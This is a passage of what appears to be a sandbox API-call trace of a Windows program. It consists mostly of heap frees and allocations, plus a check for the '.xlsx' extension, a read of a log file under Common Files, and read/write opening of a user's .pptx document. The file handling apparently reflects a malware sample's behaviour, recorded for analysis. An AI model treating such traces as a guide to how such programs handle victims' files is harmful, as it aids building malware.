lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0032.871] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.872] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.873] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af348 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.874] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.874] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.874] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.874] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.874] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.874] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.875] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.875] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xdce, lpOverlapped=0x0) returned 1 [0032.875] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.875] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xdce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.875] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.875] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0032.875] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.876] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.876] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.876] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.876] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.876] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.876] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.876] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.877] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\azdr3iffhu3nwrtgjj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.877] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.878] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.878] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.878] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.878] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.878] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: 